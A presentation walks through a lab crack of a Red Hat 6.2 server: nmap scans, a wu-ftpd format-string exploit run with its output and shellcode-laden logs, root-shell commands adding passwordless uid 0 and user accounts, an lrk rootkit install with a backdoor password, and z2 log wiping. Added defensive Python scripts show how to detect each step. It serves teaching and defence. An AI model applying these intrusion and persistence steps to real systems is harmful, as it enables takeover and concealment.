This presentation will demonstrate a live crack of a GNU/Linux server. Although we have "pre-staged" the software, and have obviously tested the entire scenario, all the techniques and software we will use were gathered from the Internet.
This presentation is not a lesson on "How To Crack." Instead, the focus is on the mechanics of a crack in a typical cracker scenario, so much of the time will be spent looking at the state of the cracked system. The point is to show how simple it can be to crack a vulnerable system, given the necessary tools, preparation, and enough time.
Throughout the presentation we will try to make each step clear by stating the purpose of each task and giving a top-level explanation of the technology being used. Please feel free to ask clarifying questions as the presentation progresses.
This is a description of each of the systems used in the demonstration. They are all connected to a completely private Ethernet network.
This is a description of all the major software used on each of the systems. Again, it should be pointed out that all of this software was pulled directly from the Internet.
Here is a top level view of how the crack will proceed:
nmap, available from http://www.nmap.org, provides "network-wide ping sweep, portscan and OS detection." It is used by crackers and by network/system administrators alike to map out a network.
The cracker runs nmapfe, the graphical interface to nmap, using the defaults:
The cracker only needs to enter the IP network to scan: 192.168.3.0/24 (the network address followed by the prefix length, i.e. the number of one bits in the subnet mask).
The command-line would be:
nmap -sS -O 192.168.3.0/24
Here's the output:
Starting nmap V. 2.54BETA26 ( www.insecure.org/nmap/ )
Host (192.168.3.0) seems to be a subnet broadcast address (returned 2 extra pings). Skipping host.
Adding open port 513/tcp
Adding open port 1024/tcp
Adding open port 111/tcp
Adding open port 956/tcp
Adding open port 23/tcp
Adding open port 113/tcp
Adding open port 79/tcp
Adding open port 80/tcp
Adding open port 21/tcp
Adding open port 514/tcp
Adding open port 515/tcp
Adding open port 98/tcp
Adding open port 25/tcp
Interesting ports on server.here.com (192.168.3.2):
(The 1535 ports scanned but not shown below are in state: closed)
Port       State       Service
21/tcp     open        ftp
23/tcp     open        telnet
25/tcp     open        smtp
79/tcp     open        finger
80/tcp     open        http
98/tcp     open        linuxconf
111/tcp    open        sunrpc
113/tcp    open        auth
513/tcp    open        login
514/tcp    open        shell
515/tcp    open        printer
956/tcp    open        unknown
1024/tcp   open        kdm
Remote operating system guess: Linux 2.1.19 - 2.2.17
Uptime 0.802 days (since Tue Jul 10 17:57:49 2001)

Adding open port 111/tcp
Adding open port 22/tcp
Adding open port 6000/tcp
Adding open port 3306/tcp
Adding open port 113/tcp
Adding open port 80/tcp
Adding open port 443/tcp
Interesting ports on john.here.com (192.168.3.3):
(The 1541 ports scanned but not shown below are in state: closed)
Port       State       Service
22/tcp     open        ssh
80/tcp     open        http
111/tcp    open        sunrpc
113/tcp    open        auth
443/tcp    open        https
3306/tcp   open        mysql
6000/tcp   open        X11
Remote operating system guess: Linux Kernel 2.4.0 - 2.4.5 (X86)
Uptime 0.048 days (since Wed Jul 11 12:03:22 2001)

Adding open port 7/tcp
Adding open port 1024/tcp
Adding open port 111/tcp
Adding open port 22/tcp
Adding open port 6000/tcp
Adding open port 23/tcp
Adding open port 3306/tcp
Adding open port 113/tcp
Adding open port 80/tcp
Interesting ports on emaca.here.com (192.168.3.236):
(The 1539 ports scanned but not shown below are in state: closed)
Port       State       Service
7/tcp      open        echo
22/tcp     open        ssh
23/tcp     open        telnet
80/tcp     open        http
111/tcp    open        sunrpc
113/tcp    open        auth
1024/tcp   open        kdm
3306/tcp   open        mysql
6000/tcp   open        X11
Remote operating system guess: Linux Kernel 2.4.0 - 2.4.5 (X86)
Uptime 0.055 days (since Wed Jul 11 11:53:36 2001)
Host (192.168.3.255) seems to be a subnet broadcast address (returned 2 extra pings). Skipping host.
Nmap run completed -- 256 IP addresses (3 hosts up) scanned in 13 seconds
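As an added example (not part of the presentation), here is the same scan read from the defender's side: a small parser for nmap's normal output, fed the page's own results as constructed input, that reports which hosts expose cleartext-login or information/remote-administration services. The two port tables are this example's assumptions about what counts as risky.

```python
# Added example, not from the presentation: parse nmap's normal output and
# report, per host, the services a defender should have turned off before the
# cracker ever scanned.  NMAP_OUTPUT is the page's scan, trimmed to two hosts;
# the two risk tables are this example's own assumptions.
import re

NMAP_OUTPUT = """\
Interesting ports on server.here.com (192.168.3.2):
(The 1535 ports scanned but not shown below are in state: closed)
Port       State       Service
21/tcp     open        ftp
23/tcp     open        telnet
25/tcp     open        smtp
79/tcp     open        finger
80/tcp     open        http
98/tcp     open        linuxconf
111/tcp    open        sunrpc
113/tcp    open        auth
513/tcp    open        login
514/tcp    open        shell
515/tcp    open        printer
956/tcp    open        unknown
1024/tcp   open        kdm
Remote operating system guess: Linux 2.1.19 - 2.2.17

Interesting ports on john.here.com (192.168.3.3):
(The 1541 ports scanned but not shown below are in state: closed)
Port       State       Service
22/tcp     open        ssh
80/tcp     open        http
111/tcp    open        sunrpc
113/tcp    open        auth
443/tcp    open        https
3306/tcp   open        mysql
6000/tcp   open        X11
Remote operating system guess: Linux Kernel 2.4.0 - 2.4.5 (X86)
"""

# Assumed risk tables: services that carry credentials in the clear, and
# services that hand a remote party information or administrative access.
CLEARTEXT_LOGIN = {21: "ftp", 23: "telnet", 513: "rlogin", 514: "rsh"}
INFO_OR_ADMIN = {79: "finger", 98: "linuxconf", 111: "portmapper", 6000: "X11"}

HOST_RE = re.compile(r"^Interesting ports on (\S+) \(([\d.]+)\):")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)")
OS_RE = re.compile(r"^Remote operating system guess: (.+)$")


def parse_nmap(text):
    """Return {hostname: {"ip": str, "os": str, "ports": [(port, proto, service)]}}."""
    hosts = {}
    current = None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = hosts.setdefault(m.group(1), {"ip": m.group(2), "os": "", "ports": []})
            continue
        if current is None:
            continue
        m = PORT_RE.match(line)
        if m:
            current["ports"].append((int(m.group(1)), m.group(2), m.group(3)))
            continue
        m = OS_RE.match(line)
        if m:
            current["os"] = m.group(1)
    return hosts


def risky_services(hosts):
    """Per host, the open TCP ports found in either risk table, in scan order."""
    report = {}
    for name, info in hosts.items():
        findings = []
        for port, proto, service in info["ports"]:
            if proto != "tcp":
                continue
            if port in CLEARTEXT_LOGIN:
                findings.append((port, service, "cleartext login; credentials are sniffable"))
            elif port in INFO_OR_ADMIN:
                findings.append((port, service, "information/remote-admin service; firewall or disable"))
        report[name] = findings
    return report


if __name__ == "__main__":
    for host, findings in risky_services(parse_nmap(NMAP_OUTPUT)).items():
        print(host)
        for port, service, why in findings:
            print(f"  {port}/tcp {service}: {why}")
```

Run against the page's scan it flags seven of server's thirteen services (ftp, telnet, finger, linuxconf, sunrpc, login, shell), which is the shortlist the cracker works from in the rest of the presentation.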
The scan alone tells the cracker that server runs telnet, FTP, finger, linuxconf, the r-services (login, shell) and lpd, all of them cleartext or historically buggy services. Knowing from nmap's OS guess that server runs a Linux kernel, the cracker next uses telnet to find out which distribution and release it is, hoping the default pre-login banner (the contents of /etc/issue.net) gives it away:
[root@emaca log]# telnet server.here.com
Trying 192.168.3.2...
Connected to server.here.com.
Escape character is '^]'.

Red Hat Linux release 6.2 (Zoot)
Kernel 2.2.14-5.0 on an i586
login:
telnet> quit
Connection closed.
[root@emaca log]# exit
May 16 19:40:54 server in.telnetd[695]: connect from 192.168.3.236
May 16 19:40:59 server inetd[491]: pid 695: exit status 1
A security-conscious administrator reading the logs sees an in.telnetd connection from 192.168.3.236 at 19:40:54 and, five seconds later, inetd reporting that the same child (pid 695) exited with status 1, with no login recorded in between. A telnet connection that opens and closes without a login is the classic signature of banner grabbing and should raise suspicion.
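As an added example (not part of the presentation, and not something the authors ran), here is the correlation an administrator could script for that pattern. The first two sample log lines are the page's own; the others are constructed in the same syslog format, and the login[...]: LOGIN ON ... BY ... FROM ... line (util-linux login's message) is assumed to be what a completed session leaves behind. Matching a connect to a login by source address within a short window is this example's assumption.

```python
# Added example, not from the presentation: flag in.telnetd connects that end
# without a login behind them.  The first two SAMPLE_LOG lines are the page's;
# the rest are constructed.  Correlating connect -> login by source address
# within a window, and connect -> exit by pid, are this example's assumptions.
import re
from datetime import datetime, timedelta

SAMPLE_LOG = """\
May 16 19:40:54 server in.telnetd[695]: connect from 192.168.3.236
May 16 19:40:59 server inetd[491]: pid 695: exit status 1
May 16 19:42:05 server in.telnetd[702]: connect from 192.168.3.3
May 16 19:42:11 server login[704]: LOGIN ON pts/0 BY john FROM 192.168.3.3
May 16 19:55:00 server in.telnetd[730]: connect from 192.168.3.236
May 16 19:55:03 server inetd[491]: pid 730: exit status 1
"""

TS = r"(\w{3} +\d+ \d\d:\d\d:\d\d)"
CONNECT_RE = re.compile(TS + r" \S+ in\.telnetd\[(\d+)\]: connect from (\S+)")
EXIT_RE = re.compile(TS + r" \S+ inetd\[\d+\]: pid (\d+): exit status (\d+)")
LOGIN_RE = re.compile(TS + r" \S+ login\[\d+\]: LOGIN ON (\S+) BY (\S+) FROM (\S+)")


def _when(stamp, year=2001):
    """syslog stamps carry no year; the page's logs are from 2001."""
    return datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")


def find_banner_grabs(log_text, window=timedelta(seconds=60)):
    """Return telnet connects with no login from the same source inside `window`."""
    connects, exits, logins = {}, {}, []
    for line in log_text.splitlines():
        m = CONNECT_RE.match(line)
        if m:
            connects[int(m.group(2))] = (_when(m.group(1)), m.group(3))
            continue
        m = EXIT_RE.match(line)
        if m:
            exits[int(m.group(2))] = (_when(m.group(1)), int(m.group(3)))
            continue
        m = LOGIN_RE.match(line)
        if m:
            logins.append((_when(m.group(1)), m.group(4), m.group(3)))  # (time, source, user)
    flagged = []
    for pid, (t, src) in sorted(connects.items()):
        if any(src == lsrc and t <= lt <= t + window for lt, lsrc, _ in logins):
            continue
        exit_time, status = exits.get(pid, (None, None))
        flagged.append({
            "pid": pid,
            "source": src,
            "connected_at": t.strftime("%b %d %H:%M:%S"),
            "lasted_seconds": (exit_time - t).total_seconds() if exit_time else None,
            "exit_status": status,
        })
    return flagged


if __name__ == "__main__":
    for hit in find_banner_grabs(SAMPLE_LOG):
        print(f"telnet connect from {hit['source']} at {hit['connected_at']} "
              f"(pid {hit['pid']}) ended after {hit['lasted_seconds']}s with no login")
```

On the sample it reports the two connects from 192.168.3.236 (five and three seconds long, exit status 1) and leaves john's session alone. Reading the logs from the compromised host itself is only meaningful before the rootkit arrives; after that the check belongs on a log host the cracker cannot reach.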
For reference, this is /etc/passwd on server before the attack:
[root@server /root]# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/:
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
named:x:25:25:Named:/var/named:/bin/false
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
john:x:500:500::/home/john:/bin/bash
The Red Hat 6.2 banner tells the cracker which FTP daemon to expect (the wu-2.6.0 build that shows in the FTP banner below), so the cracker tries a wu-ftpd exploit: one for the format-string bug in wu-ftpd 2.6.0's SITE EXEC handling. The '%x %x %x' strings in the output are the exploit reading the stack through that bug to find its return address:
[root@emaca wu-ftp]# ./f server
Connected to: server
Banner: 220 server.here.com FTP server (Version wu-2.6.0(1) Mon Feb 28 10:30:36 EST 2000) ready.
Logged in..
+ Finding ret addresses
Wuftpd is vulnerable : 200-31 bffff548 1ee bfffd4d0 +bfffd0cc |0
200 (end of '%x %x %x %x +%x |%x')
Ret location befor: 0
Ret location : bfffd074
Proctitle addres : 807347b and 134689915
tmp 1 : 0x62626262
tmp 2 : 0x0
tmp 1 : 0xbfffd074
Cached a : 24
Trying with : 23
 Wait for a shell.....
200-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbtÐÿ¿-2-2000-200000000000000000000000000
0000000nan00000000-2000000000000000000000000000000000000000000000000000000000000
00000000000000-2-240nan0-10737512241074522093-10737512241074533003-1073751144107
5212780-1073751144-1073750870-10737508661713262567819201692631852400175188667652
71702389037163375907516337718731633771873163377187316337718731633771873163377187
31633771873|00000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
. . .
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000
The exploit works. It gives the cracker a root shell on the server, but there is no prompt, because the shell's input and output are the exploited FTP server's control connection. Here are the actual commands the cracker types, interleaved with the real output:
hostname
server
whoami
root
who
root     tty1     May 16 19:37
john     pts/0    May 16 19:42
echo $SHELL
/bin/bash
echo $PATH
/usr/local/bin:/bin:/usr/bin
export PATH="$PATH:/usr/sbin"
echo $PATH
/usr/local/bin:/bin:/usr/bin:/usr/sbin
adduser -u 0 -g 0 r00t
passwd -d r00t
Changing password for user r00t
Removing password for user r00t
passwd: Success
adduser jroberts
passwd -d jroberts
Changing password for user jroberts
Removing password for user jroberts
passwd: Success
exit
Connection closed - EOF
[root@emaca wu-ftp]#
At this point the server is effectively under the cracker's control ("owned"): there is now a second uid 0 account (r00t) and an ordinary account (jroberts), both with no password, usable over telnet and FTP without the exploit.
May 16 20:01:18 server in.ftpd[746]: connect from 192.168.3.236
May 17 01:01:19 server ftpd[746]: ANONYMOUS FTP LOGIN FROM emaca.here.com [192.168.3.236], 1À1Û1ɰFÍ1À1ÛCÙA°?Íëk^1À1É^^AF^Df¹ÿ^A°'Í1À^^A°=Í1À1Û^^HC^B1ÉþÉ1 À^^H°^LÍþÉuó1ÀF^I^^H°=Íþ^N°0þÈF^D1ÀF^Gv^HF^LóN^HV^L°^KÍ1À1Û°^AÍèÿÿÿ0bin0sh1..11
May 16 20:04:35 server adduser[756]: new user: name=r00t, uid=0, gid=0, home=/home/r00t, shell=/bin/bash
May 16 20:05:42 server adduser[758]: new group: name=jroberts, gid=501
May 16 20:05:42 server adduser[758]: new user: name=jroberts, uid=501, gid=501, home=/home/jroberts, shell=/bin/bash
Three things stand out in the log: the anonymous FTP "password", which wu-ftpd records verbatim, is binary (the exploit's shellcode, with its /bin/sh string visible as 0bin0sh at the end); adduser logged a new account with uid=0; and both adduser entries arrive a few minutes after the FTP connection from the same host.
An administrator who noticed those entries would realize the system has been cracked and would start looking at it in detail. The easiest thing to check is /etc/passwd, which now carries two extra entries at the end:
[root@server /root]# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/:
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
named:x:25:25:Named:/var/named:/bin/false
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
john:x:500:500::/home/john:/bin/bash
r00t:x:0:0::/home/r00t:/bin/bash
jroberts:x:501:501::/home/jroberts:/bin/bash
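An added example, not part of the presentation: the checks that find these changes mechanically instead of by eye, namely a second uid 0, names absent from a known-good copy, and empty password fields (what passwd -d leaves in /etc/shadow). The passwd lines are trimmed from the page's two listings; the /etc/shadow lines (placeholder hashes) and the practice of keeping a baseline copy of /etc/passwd off the machine to compare against are this example's assumptions.

```python
# Added example, not from the presentation: audit /etc/passwd and /etc/shadow
# for what the cracker just did.  Passwd lines are trimmed from the page's
# listings; the shadow lines are constructed (placeholder hashes, '*'/'!!'
# locked system accounts, and the empty field that `passwd -d` produces).
from collections import Counter

BASELINE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/:
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
named:x:25:25:Named:/var/named:/bin/false
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
john:x:500:500::/home/john:/bin/bash
"""
CURRENT_PASSWD = BASELINE_PASSWD + """\
r00t:x:0:0::/home/r00t:/bin/bash
jroberts:x:501:501::/home/jroberts:/bin/bash
"""
SHADOW = """\
root:$1$Zs3k9Qmx$0m1dYwWw0Tq1Ff3r7yQx5.:11458:0:99999:7:::
bin:*:11458:0:99999:7:::
daemon:*:11458:0:99999:7:::
ftp:*:11458:0:99999:7:::
nobody:*:11458:0:99999:7:::
xfs:!!:11458:0:99999:7:::
named:!!:11458:0:99999:7:::
postgres:!!:11458:0:99999:7:::
john:$1$H0JpQ3Zo$pP8kXy3bq2sOeoA9Vn0Bi1:11458:0:99999:7:::
r00t::11458:0:99999:7:::
jroberts::11458:0:99999:7:::
"""


def parse_passwd(text):
    """Parse passwd(5) lines into dicts; the trailing shell field may be empty."""
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        name, _pw, uid, gid, _gecos, home, shell = line.split(":", 6)
        entries.append({"name": name, "uid": int(uid), "gid": int(gid), "home": home, "shell": shell})
    return entries


def parse_shadow(text):
    """Map account name to the hashed-password field of shadow(5)."""
    hashes = {}
    for line in text.splitlines():
        if line.strip():
            name, hashed = line.split(":", 2)[:2]
            hashes[name] = hashed
    return hashes


def audit_accounts(passwd_text, shadow_text, baseline_text):
    """Return [(account, finding)] in passwd order; an empty list means nothing found."""
    entries = parse_passwd(passwd_text)
    known = {e["name"] for e in parse_passwd(baseline_text)}
    hashes = parse_shadow(shadow_text)
    uid_owners = Counter(e["uid"] for e in entries)
    findings = []
    for e in entries:
        name = e["name"]
        if e["uid"] == 0 and name != "root":
            findings.append((name, "uid 0: a second superuser account"))
        elif e["uid"] != 0 and uid_owners[e["uid"]] > 1:
            findings.append((name, f"shares uid {e['uid']} with another account"))
        if name not in known:
            findings.append((name, "not in the baseline copy of /etc/passwd"))
        if name not in hashes:
            findings.append((name, "no /etc/shadow entry"))
        elif hashes[name] == "":
            findings.append((name, "empty password field: logs in with no password"))
    return findings


if __name__ == "__main__":
    for account, finding in audit_accounts(CURRENT_PASSWD, SHADOW, BASELINE_PASSWD):
        print(f"{account}: {finding}")
```

Against the page's data the report names only r00t (uid 0, not in baseline, empty password) and jroberts (not in baseline, empty password). The same logic works from a rescue boot against the mounted disk, which is where it belongs once a rootkit is suspected, since the cracker later deletes these accounts again.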
Next the cracker logs in over FTP as jroberts (the password is empty, so <ENTER> is all that is needed) and uploads the rootkit tarball:
[root@emaca rk]# ftp server
Connected to server.here.com.
220 server.here.com FTP server (Version wu-2.6.0(1) Mon Feb 28 10:30:36 EST 2000) ready.
Name (server:root): jroberts
331 Password required for jroberts.
Password: <ENTER>
230 User jroberts logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put l.tar.gz
local: l.tar.gz remote: l.tar.gz
200 PORT command successful.
150 Opening BINARY mode data connection for l.tar.gz.
226 Transfer complete.
3207597 bytes sent in 3.44 secs (9.1e+02 Kbytes/sec)
ftp> quit
221-You have transferred 3207597 bytes in 1 files.
221-Total traffic for this session was 3208018 bytes in 1 transfers.
221-Thank you for using the FTP service on server.here.com.
221 Goodbye.
[root@emaca rk]#
The cracker then connects to the server over telnet as jroberts, again with no password:
[root@emaca rk]# telnet server
Trying 192.168.3.2...
Connected to server.here.com.
Escape character is '^]'.

Red Hat Linux release 6.2 (Zoot)
Kernel 2.2.14-5.0 on an i586
login: jroberts
Last login: Wed May 16 20:36:29 from emaca.here.com
[jroberts@server jroberts]$
The cracker becomes r00t and unpacks their tools:
[jroberts@server jroberts]$ su - r00t
[root@server r00t]# cd ~jroberts
[root@server jroberts]# ls -l
total 3140
-rw-r--r--    1 jroberts jroberts  3207597 May 16 20:42 l.tar.gz
[root@server jroberts]# tar -xzf l.tar.gz
[root@server jroberts]# ls
MCONFIG     bindshell.c     findutils  hdar          login                 psmisc         sniffchk      wted.c
Makefile    chfn            fix        inetd         net-tools-1.32-alpha  rootkit.h      sysklogd-1.3  z2
README      chsh            fix.c      l.tar.gz      passwd                rshd           tcp.log       z2.c
bin         cron3.0pl1      hdap       linsniffer    procps-1.01           shadow-961025  tcpd_7.4
bindshell   fileutils-3.13  hdaq       linsniffer.c  procps-1.01_mess      sniff.pid      wted
[root@server jroberts]#
Next, the cracker installs the pre-compiled rootkit. The file list is that of the lrk (Linux Root Kit) family: trojaned replacements for login, passwd, chfn and chsh, for ps (procps), netstat (net-tools), ls (fileutils), find, inetd, tcpd and syslogd, plus a packet sniffer (linsniffer), a bind shell, the utmp/wtmp editors z2 and wted, and fix, which swaps a trojan in while trying to preserve the original's sum checksum:
[root@server jroberts]# make install
if [ -x /usr/bin/chfn ] && [ -x bin/chfn ]; then ./fix /usr/bin/chfn bin/chfn; fi
fix: Last 17 bytes not zero
fix: Can't fix checksum
fix: File /usr/bin/chfn fixed
if [ -x /usr/bin/chsh ] && [ -x bin/chsh ]; then ./fix /usr/bin/chsh bin/chsh; fi
fix: Last 17 bytes not zero
fix: Can't fix checksum
fix: File /usr/bin/chsh fixed
. . .
if [ -x /usr/bin/pidof ] && [ -x psmisc/killall ] && [ -x /bin/killall ]; then ln -sf /bin/killall psmisc/pidof; fi
if [ -x /usr/bin/pidof ] && [ -x psmisc/killall ] && [ -x /usr/bin/killall ]; then ln -sf /usr/bin/killall psmisc/pidof; fi
if [ -x /usr/bin/pidof ] && [ -x psmisc/killall ] && [ -x /usr/bin/killall ]; then ./fix /usr/bin/pidof psmisc/pidof; fi
if [ -x /sbin/pidof ] && [ -x psmisc/killall ] && [ -x /usr/bin/killall ]; then ./fix /sbin/pidof psmisc/pidof; fi
if [ -x /usr/bin/find ] && [ -x findutils/find/find ]; then ./fix /usr/bin/find findutils/find/find; fi
fix: Last 17 bytes not zero
fix: Can't fix checksum
fix: File /usr/bin/find fixed
[root@server jroberts]#
Each fix invocation above replaces a system binary with the kit's trojaned version and tries to make the replacement report the same checksum under the sum command as the original, so that an administrator comparing against a saved list of sums sees no change. Judging by the messages, it does this by rewriting trailing padding bytes, and it gave up on chfn, chsh and find because the last 17 bytes of the replacement were not zero; the files were replaced anyway. Two points for the defender follow. First, sum is a 16-bit checksum, not a cryptographic hash: a few free bytes at the end of a file are enough to make it match any target value, so a sum list proves nothing. Second, the tools one would use to check (find, ls, ps, netstat, login) are among the binaries the kit replaces, so an integrity check must use cryptographic hashes (rpm -V compares MD5 sums against the package database; a Tripwire database kept offline is better still) and must run from known-good binaries, for example after booting from rescue media.
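As an added example (not from the presentation, and not the kit's fix.c), here is why a sum checksum can be "fixed" and why a cryptographic hash cannot. bsd_sum() is the real sum / sum -r algorithm (rotate right one bit, add the byte, mod 2^16); forge_tail() is this example's own search for a short tail that makes a trojaned file report the original's checksum, and the two "binaries" are constructed stand-ins.

```python
# Added example, not from the presentation: why fix can make a trojaned
# binary report the original's `sum` checksum, and why a cryptographic hash
# defeats that.  bsd_sum() is the real `sum -r` algorithm (the default for
# GNU sum); forge_tail() and the two stand-in "binaries" are this example's.
import hashlib
from typing import Optional

MASK = 0xFFFF
STATES = MASK + 1


def rot(x: int) -> int:
    """One-bit right rotation of a 16-bit value, the step `sum` takes per byte."""
    return (x >> 1) | ((x & 1) << 15)


def unrot(y: int) -> int:
    """Inverse of rot()."""
    return ((y << 1) & MASK) | (y >> 15)


def bsd_sum(data: bytes) -> int:
    """Checksum column of `sum` / `sum -r`: rotate right one bit, add the byte."""
    s = 0
    for b in data:
        s = (rot(s) + b) & MASK
    return s


def _rot_map(flags: bytearray) -> bytearray:
    """Set of rot(x) for every state x in flags (rot is a bijection on 16 bits)."""
    out = bytearray(STATES)
    for x in range(STATES):
        if flags[x]:
            out[rot(x)] = 1
    return out


def _add_byte(flags: bytearray) -> bytearray:
    """Set of (x + b) mod 2^16 for x in flags and b in 0..255, via a sliding window."""
    out = bytearray(STATES)
    count = sum(flags[STATES - 255:])           # window y-255 .. y-1 for y == 0
    for y in range(STATES):
        count += flags[y]
        out[y] = 1 if count else 0
        count -= flags[(y - 255) % STATES]
    return out


def forge_tail(prefix: bytes, target: int, max_tail: int = 12) -> Optional[bytes]:
    """Shortest tail with bsd_sum(prefix + tail) == target, or None.

    Level k holds exactly the checksum states reachable after k free bytes.
    Each extra byte doubles the number of reachable runs of values and halves
    their spacing, so nine free bytes reach every 16-bit value: a binary with
    a few zero padding bytes at the end is always "fixable".
    """
    levels = [bytearray(STATES)]
    levels[0][bsd_sum(prefix)] = 1
    for _ in range(max_tail):
        levels.append(_add_byte(_rot_map(levels[-1])))
        if levels[-1][target]:
            break
    else:
        return None
    tail, state = bytearray(), target            # walk back one byte per level
    for level in range(len(levels) - 1, 0, -1):
        for b in range(256):
            prev = unrot((state - b) & MASK)
            if levels[level - 1][prev]:
                tail.append(b)
                state = prev
                break
    return bytes(reversed(tail))


def demo() -> dict:
    """Constructed 'original' and 'trojan' files; fix the trojan's sum to match."""
    original = b"\x7fELF original /bin/find contents " * 60
    trojan = b"\x7fELF trojaned /bin/find contents " * 60
    target = bsd_sum(original)
    tail = forge_tail(trojan, target)
    fixed = trojan + tail
    return {
        "tail_len": len(tail),
        "sum_matches": bsd_sum(fixed) == target,
        "sha256_matches": hashlib.sha256(fixed).digest()
        == hashlib.sha256(original).digest(),
    }


if __name__ == "__main__":
    print(demo())
```

demo() returns sum_matches True after appending at most nine bytes, while the SHA-256 digests (or MD5, which is what rpm -V of the period compared) still differ. The second half of the sum output, the block count, changes only if the padding pushes the file over a 1 KiB boundary, which is why fix wants a few bytes of existing zero padding rather than growing the file.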
Afterwards the cracker comes back in through the kit's trojaned login: a root login over telnet, which the stock login would refuse, now works with the backdoor password built into the kit (satori in the transcript):
[root@emaca log]# telnet server
Trying 192.168.3.2...
Connected to server.here.com.
Escape character is '^]'.

Red Hat Linux release 6.2 (Zoot)
Kernel 2.2.14-5.0 on an i586
server login: root
Password: satori
[root@server /root]# who
root     tty1     May 16 19:37
john     pts/0    May 16 19:42
[root@server /root]#
In the who output, root on tty1 is the console login and john on pts/0 is the legitimate user doing their work; the cracker's own telnet session is not listed at all. Also note that on the initial telnet connection the message configuration error - unknown item 'CREATE_HOME' (notify administrator) is displayed: the kit's login binary does not recognize an item in this system's /etc/login.defs. That message alone should tell the administrator of server that something is wrong.
[root@server /root]# last
jroberts ftpd970      emaca.here.com   Wed May 16 20:41 - 20:42  (00:00)
jroberts ftpd965      emaca.here.com   Wed May 16 20:39 - 20:41  (00:02)
jroberts pts/1        emaca.here.com   Wed May 16 20:38 - 21:00  (00:22)
jroberts pts/1        emaca.here.com   Wed May 16 20:36 - 20:38  (00:01)
jroberts ftpd857      emaca.here.com   Wed May 16 20:34 - 20:35  (00:01)
ftp      ftpd823      emaca.here.com   Wed May 16 20:30 - 20:31  (00:00)
jroberts pts/1        emaca.here.com   Wed May 16 20:29 - 20:30  (00:00)
jroberts ftpd772      emaca.here.com   Wed May 16 20:28 - 20:29  (00:00)
ftp      ftpd746      emaca.here.com   Wed May 16 20:01   still logged in
john     pts/0        192.168.3.3      Wed May 16 19:42   still logged in
root     tty1                          Wed May 16 19:37   still logged in
reboot   system boot  2.2.14-5.0       Wed May 16 19:37          (02:12)
[root@server /root]# cd /dev/hda01
[root@server hda01]# ./z2 jroberts
Zap2!
[root@server hda01]# ./z2 jroberts
Zap2!
. . .
[root@server hda01]# ./z2 ftp
Zap2!
[root@server hda01]# last
john     pts/0        192.168.3.3      Wed May 16 19:42   still logged in
root     tty1                          Wed May 16 19:37   still logged in
reboot   system boot  2.2.14-5.0       Wed May 16 19:37          (02:23)
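An added example, not part of the presentation: what a zapped wtmp looks like from the inside, and a check for it. z2 overwrites the matching records in place with zero bytes (the file does not shrink), and last silently skips zeroed records, so a run of all-zero records between live ones is the evidence. The record layout is glibc's 384-byte struct utmp on i386; the records are constructed to mirror the last output above, and zap() is this example's simplified model of what z2 does, not the kit's code.

```python
# Added example, not from the presentation: detect zapped wtmp records.
# UTMP_FMT is glibc's struct utmp on i386 (384 bytes).  The records are
# constructed to mirror the page's `last` output; zap() models z2's in-place
# zeroing and is this example's code, not the kit's.
import struct
from datetime import datetime

UTMP_FMT = "<h2xi32s4s32s256shhiii4i20x"   # ut_type, pid, line, id, user, host, exit, session, tv, addr
UTMP_SIZE = struct.calcsize(UTMP_FMT)      # 384
BOOT_TIME, USER_PROCESS = 2, 7


def pack_record(ut_type, pid, line, user, host, when):
    """Build one wtmp record; fields the demo does not need are left zero."""
    return struct.pack(UTMP_FMT, ut_type, pid, line.encode(), b"", user.encode(),
                       host.encode(), 0, 0, 0, int(when.timestamp()), 0, 0, 0, 0, 0)


def build_sample_wtmp():
    """Constructed wtmp mirroring a subset of the `last` output above."""
    def at(h, m):
        return datetime(2001, 5, 16, h, m)
    return b"".join([
        pack_record(BOOT_TIME, 0, "~", "reboot", "2.2.14-5.0", at(19, 37)),
        pack_record(USER_PROCESS, 401, "tty1", "root", "", at(19, 37)),
        pack_record(USER_PROCESS, 552, "pts/0", "john", "192.168.3.3", at(19, 42)),
        pack_record(USER_PROCESS, 746, "ftpd746", "ftp", "emaca.here.com", at(20, 1)),
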